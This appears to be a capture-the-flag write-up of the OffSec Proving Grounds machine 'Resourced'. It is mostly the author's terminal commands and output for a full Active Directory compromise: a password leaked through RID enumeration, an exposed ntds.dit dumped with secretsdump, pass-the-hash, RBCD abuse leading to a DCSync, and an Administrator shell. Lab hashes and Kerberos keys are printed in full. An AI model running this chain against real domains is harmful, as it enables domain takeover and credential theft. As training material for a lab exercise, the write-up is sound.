← all writeups
Proving Grounds (OffSec)

Resourced

AD Windows Insane

Proving Grounds · retired · 2026-07-17

Summary: A Windows Active Directory domain controller — testing RID-cycling enumeration that leaks a plaintext password from a user description field, a grossly misconfigured share that exposes the domain's NTDS database directly, offline hash extraction and pass-the-hash, and BloodHound-guided resource-based constrained delegation abuse to DCSync the domain.

active-directoryntds-exposurepass-the-hashbloodhoundrbcddcsync

Enumeration

nmap scans:

┌──(kali㉿kali)-[~/oscp/resourced]
└─$ sudo nmap target -p- -T4 -oN portscan
[sudo] password for kali: 
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-17 17:12 -0400
Nmap scan report for target (192.168.204.175)
Host is up (0.059s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49668/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49695/tcp open  unknown
49710/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 93.19 seconds

┌──(kali㉿kali)-[~/oscp/resourced]
└─$ sudo nmap target -p53,88,135,139,445,464,593,636,3268,3269,3389,5985,9389 -T4 -sCV -oN fingerprint
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-17 17:15 -0400
Nmap scan report for target (192.168.204.175)
Host is up (0.055s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-07-17 21:15:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: resourced.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-07-17T21:16:11+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: resourced
|   NetBIOS_Domain_Name: resourced
|   NetBIOS_Computer_Name: RESOURCEDC
|   DNS_Domain_Name: resourced.local
|   DNS_Computer_Name: ResourceDC.resourced.local
|   DNS_Tree_Name: resourced.local
|   Product_Version: 10.0.17763
|_  System_Time: 2026-07-17T21:15:32+00:00
| ssl-cert: Subject: commonName=ResourceDC.resourced.local
| Not valid before: 2026-07-16T21:10:37
|_Not valid after:  2027-01-15T21:10:37
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-07-17T21:15:34
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.46 seconds

Using nxc we can find that we can actually authenticate to the ldap but ir throws an Error in SearchRequest. We run enum4linux to try to query ldap and rpc for info about our target with no credentials.

We find a domain user list (via rid-bruteforcing I think):

index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain                
index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant       Name: (null)    Desc: Linear Algebra and crypto god
index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg     Name: (null)    Desc: Blockchain expert
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson      Name: (null)    Desc: Networking specialist
index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null)    Desc: Frontend Developer
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone  Name: (null)    Desc: SysAdmin
index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason        Name: (null)    Desc: Ex IT admin
index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker       Name: (null)    Desc: Backend Developer
index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson     Name: (null)    Desc: Database Admin
index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson      Name: (null)    Desc: Military Vet now cybersecurity specialist
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz        Name: (null)    Desc: New-hired, reminder: HotelCalifornia194!

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[M.Mason] rid:[0x44f]
user:[K.Keen] rid:[0x450]
user:[L.Livingstone] rid:[0x451]
user:[J.Johnson] rid:[0x452]
user:[V.Ventz] rid:[0x453]
user:[S.Swanson] rid:[0x454]
user:[P.Parker] rid:[0x455]
user:[R.Robinson] rid:[0x456]
user:[D.Durant] rid:[0x457]
user:[G.Goldberg] rid:[0x458]

This leaks a password for V.Ventz in the description.

I use awk '{print $8}' on the above section make a Users.txt list.

Foothold

We have our cred pair: V.Ventz:HotelCalifornia194!

┌──(kali㉿kali)-[~/oscp/resourced]
└─$ nxc smb target -u 'V.Ventz' -p 'HotelCalifornia194!' -d resourced.local --shares
SMB         192.168.204.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:None) (Null Auth:True)                                                                                                                                
SMB         192.168.204.175 445    RESOURCEDC       [+] resourced.local\V.Ventz:HotelCalifornia194! 
SMB         192.168.204.175 445    RESOURCEDC       [*] Enumerated shares
SMB         192.168.204.175 445    RESOURCEDC       Share           Permissions     Remark
SMB         192.168.204.175 445    RESOURCEDC       -----           -----------     ------
SMB         192.168.204.175 445    RESOURCEDC       ADMIN$                          Remote Admin
SMB         192.168.204.175 445    RESOURCEDC       C$                              Default share
SMB         192.168.204.175 445    RESOURCEDC       IPC$            READ            Remote IPC
SMB         192.168.204.175 445    RESOURCEDC       NETLOGON        READ            Logon server share 
SMB         192.168.204.175 445    RESOURCEDC       Password Audit  READ            
SMB         192.168.204.175 445    RESOURCEDC       SYSVOL          READ            Logon server share 

We see custom share Password Audit and we investigate with impacket-smbclient:

┌──(kali㉿kali)-[~/oscp/resourced]
└─$ impacket-smbclient resourced.local/v.ventz:'HotelCalifornia194!'@192.168.204.175
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# shares
uiADMIN$
C$
IPC$
NETLOGON
Password Audit
SYSVOL
# use Password Audit
# dir
*** Unknown syntax: dir
# ls
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 .
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 ..
drw-rw-rw-          0  Tue Oct  5 04:49:15 2021 Active Directory
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 registry

# cd Active Directory
# ls
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 .
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 ..
-rw-rw-rw-   25165824  Tue Oct  5 04:49:16 2021 ntds.dit
-rw-rw-rw-      16384  Tue Oct  5 04:49:16 2021 ntds.jfm
# get ntds.dit
# get ntds.jfm
# cd ..
# ls
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 .
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 ..
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 Active Directory
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 registry
# cd registry
# ls
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 .
drw-rw-rw-          0  Tue Oct  5 04:49:16 2021 ..
-rw-rw-rw-      65536  Tue Oct  5 04:49:16 2021 SECURITY
-rw-rw-rw-   16777216  Tue Oct  5 04:49:16 2021 SYSTEM

Curiously we find a ntds.dit in Active Directory, with SYSTEM we can dump the hashes in this domain database.

We can also dump the SECURITY hive we find with SYSTEM as well.

We can use [[impacket-secretsdump]] to dump them offline:

┌──(kali㉿kali)-[~/oscp/resourced/passauditshare]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL 


Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:507fdb105d9322cf53420c95780adf5f2dcdac7ca14f8b37188370c916a3fa6f2a511bb284aeac71211c939a866a2b4cc02c408e1d242ad4f5cc8f7b85d2448c18d23fb47f7b9b543a6cfb8999e40037f23dbfd8690869753979d15fe61bdcddb0ccff3d20c275207ca93e844c3b5aa1f658198225b3e54f90e0b71aaf76ba32bb1b598d189b6696c27d04674fd4c4f2c09d0df2e59fe93850aa928be813be3bd659f0d2ecba6e34fb5a3880db8155cf77e21eb44d63e1ae65abcc2aa5bdfb6bfe85e8590329929522aae501ba86d8622918e37b41daef8a2b00e78440d13e88a31fc14714923bba6fb99e13c81b3020
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x85ec8dd0e44681d9dc3ed5f0c130005786daddbd
dpapi_userkey:0x22043071c1e87a14422996eda74f2c72535d4931
[*] NL$KM 
 0000   31 BF AC 76 98 3E CF 4A  FC BD AD 0F 17 0F 49 E7   1..v.>.J......I.
 0010   DA 65 A6 F9 C7 D4 FA 92  0E 5C 60 74 E6 67 BE A7   .e.......\`t.g..
 0020   88 14 9D 4D E5 A5 3A 63  E4 88 5A AC 37 C7 1B F9   ...M..:c..Z.7...
 0030   53 9C C1 D1 6F 63 6B D1  3F 77 F4 3A 32 54 DA AC   S...ock.?w.:2T..
NL$KM:31bfac76983ecf4afcbdad0f170f49e7da65a6f9c7d4fa920e5c6074e667bea788149d4de5a53a63e4885aac37c71bf9539cc1d16f636bd13f77f43a3254daac
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8
Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2
Administrator:des-cbc-md5:80861f1a80f1232f
RESOURCEDC$:aes256-cts-hmac-sha1-96:b97344a63d83f985698a420055aa8ab4194e3bef27b17a8f79c25d18a308b2a4
RESOURCEDC$:aes128-cts-hmac-sha1-96:27ea2c704e75c6d786cf7e8ca90e0a6a
RESOURCEDC$:des-cbc-md5:ab089e317a161cc1
krbtgt:aes256-cts-hmac-sha1-96:12b5d40410eb374b6b839ba6b59382cfbe2f66bd2e238c18d4fb409f4a8ac7c5
krbtgt:aes128-cts-hmac-sha1-96:3165b2a56efb5730cfd34f2df472631a
krbtgt:des-cbc-md5:f1b602194f3713f8
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
[*] Cleaning up... 

I use the same awk structure to make a list of the users and hashes, and I use —no-bruteforce to symmetrically go down the list querying them against the DC:

──(kali㉿kali)-[~/oscp/resourced]
└─$ nxc smb target -u Users.txt -H UserHashes.txt --no-bruteforce
SMB         192.168.204.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:None) (Null Auth:True)                                                                                                                                
SMB         192.168.204.175 445    RESOURCEDC       [-] resourced.local\Administrator:12579b1666d4ac10f0f59f300776495f STATUS_LOGON_FAILURE 
SMB         192.168.204.175 445    RESOURCEDC       [-] resourced.local\Guest:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED 
SMB         192.168.204.175 445    RESOURCEDC       [-] resourced.local\RESOURCEDC$:9ddb6f4d9d01fedeb4bccfb09df1b39d STATUS_LOGON_FAILURE 
SMB         192.168.204.175 445    RESOURCEDC       [-] resourced.local\krbtgt:3004b16f88664fbebfcb9ed272b0565b STATUS_LOGON_FAILURE 
SMB         192.168.204.175 445    RESOURCEDC       [-] resourced.local\M.Mason:3105e0f6af52aba8e11d19f27e487e45 STATUS_PASSWORD_EXPIRED 
SMB         192.168.204.175 445    RESOURCEDC       [-] resourced.local\K.Keen:204410cc5a7147cd52a04ddae6754b0c STATUS_PASSWORD_EXPIRED 
SMB         192.168.204.175 445    RESOURCEDC       [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 

We find L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 still has the same password and we can pass the hash as him.

We run his creds against smb and find he has the same permissions. We attempt to crack his hash with hashcat and fail.

We can get a shell as him though with winrm pass the hash and retrieve the user flag.

Privilege Escalation

Now we can run bloodhound-python via PtH to collect data on the domain and import to bloodhound as well as transfer winPEAS over to our staging directory in C:\Users\L.Livingstone\Documents

We see we have Outbound GenericAll over RESOURCEDC.RESOURCED.LOCAL Computer:

![[Pasted image 20260717170146.png]]

According to google overview:

Abusing **Outbound GenericAll** over a Domain Controller (DC) object typically involves **Computer Object Takeover** via **Resource-Based Constrained Delegation (RBCD)**.  Since the attacker has **GenericAll** rights on the DC computer account, they can modify the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute to specify themselves (or a controlled computer) as the authorized delegate.

https://www.thehacker.recipes/ad/movement/dacl/grant-rights

Using claude we also get these steps explaining how to perform the RBCD: First we make a computer account that has SPNs, we write the RBCD on the Domain Controller computer. Then we get a ticket impersonating the Administrator of the DC computer with the new computer account. Then we can DCSync.

RBCD to DCSync

# 1. Create a computer account you control (uses MAQ)
addcomputer.py -computer-name 'FAKE01$' -computer-pass 'Passw0rd123!' \
  'resourced.local/l.livingstone' -hashes :<nthash> -dc-ip <dc-ip>

# 2. Use your GenericAll to write RBCD on RESOURCEDC, trusting FAKE01$
rbcd.py -delegate-from 'FAKE01$' -delegate-to 'RESOURCEDC$' -action write \
  'resourced.local/l.livingstone' -hashes :<nthash> -dc-ip <dc-ip>

# 3. Impersonate a DA to the DC, getting a service ticket as FAKE01$
getST.py -spn 'cifs/resourcedc.resourced.local' -impersonate 'Administrator' \
  'resourced.local/FAKE01$:Passw0rd123!' -dc-ip <dc-ip>

# 4. Use that ticket to DCSync
export KRB5CCNAME=Administrator@[email protected]
secretsdump.py -k -no-pass 'resourcedc.resourced.local' -just-dc
┌──(kali㉿kali)-[~/bloodhound-ce]
└─$ impacket-addcomputer -computer-name 'FAKE01$' -computer-pass 'NewPass123!' 'resourced.local/l.livingstone' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip 192.168.204.175
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account FAKE01$ with password NewPass123!.
                                                
┌──(kali㉿kali)-[~/bloodhound-ce]
└─$ impacket-rbcd -delegate-from 'FAKE01$' -delegate-to 'RESOURCEDC$' -action write 'resourced.local/l.livingstone' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip 192.168.204.175
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FAKE01$ can now impersonate users on RESOURCEDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FAKE01$      (S-1-5-21-537427935-490066102-1511301751-4101)
                                                
┌──(kali㉿kali)-[~/bloodhound-ce]
└─$ impacket-getST -spn 'cifs/resourcedc.resourced.local' -impersonate 'Administrator' 'resourced.local/FAKE01$:NewPass123!' -dc-ip 192.168.204.175
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@[email protected]

Now we export the generated service ticket to our kerberos cache and we can ntpdate and secretsdump the resourcedc computer with the ticket.

┌──(kali㉿kali)-[~/bloodhound-ce]
└─$ export KRB5CCNAME=Administrator@[email protected]

┌──(kali㉿kali)-[~/bloodhound-ce]
└─$ sudo ntpdate 192.168.204.175 && impacket-secretsdump -k -no-pass 'resourcedc.resourced.local' -just-dc
2026-07-17 19:13:40.979560 (-0400) -0.009484 +/- 0.028992 192.168.204.175 s1 no-leap
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e0efd059433841f73d171c69afdda7c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7ddb984fb68a47040c0931038a0ba0b4:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:c8532e8992f0e74e3850a845349e3e7f:::
FAKE01$:4101:aad3b435b51404eeaad3b435b51404ee:25451b15eeabfa492d9a18442a6e914b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8b390f83fedcfa8a5275a4a80ab1200da3c6420a502eec668fc3a23d3d8cfba5
Administrator:aes128-cts-hmac-sha1-96:efa1aa29ae0536b35a2534f0abd881a3
Administrator:des-cbc-md5:0de34cf7bf32898f
krbtgt:aes256-cts-hmac-sha1-96:a85e2a98d5c75634e9104bbd6f60507b8b22324e18e945c6b74955b02293b40f
krbtgt:aes128-cts-hmac-sha1-96:07b7d34c08ed94eafec3875bb55111d3
krbtgt:des-cbc-md5:43b6972a7abaf7d0
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
RESOURCEDC$:aes256-cts-hmac-sha1-96:ff4930dd4d30b291b677f6d570252dc6e9a3779e07c23f158910e4cdc51263bf
RESOURCEDC$:aes128-cts-hmac-sha1-96:e90ccb8c7724ec7a22004201895c4718
RESOURCEDC$:des-cbc-md5:f1750e9b13f42fda
FAKE01$:aes256-cts-hmac-sha1-96:b021f4fec6efef7c4a536e2d721dae6ad44c7b5f35411c6ce7286a13794d8bbe
FAKE01$:aes128-cts-hmac-sha1-96:2397ca7f497a8012bdb3f5abb77c8412
FAKE01$:des-cbc-md5:45ecba548f166894
[*] Cleaning up... 

Now we can pass the hash and log in to the DC as Administrator and fetch the admin flag!

┌──(kali㉿kali)-[~/oscp/resourced]
└─$ evil-winrm -i 192.168.204.175 -u 'Administrator' -H 8e0efd059433841f73d171c69afdda7c
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
resourced\administrator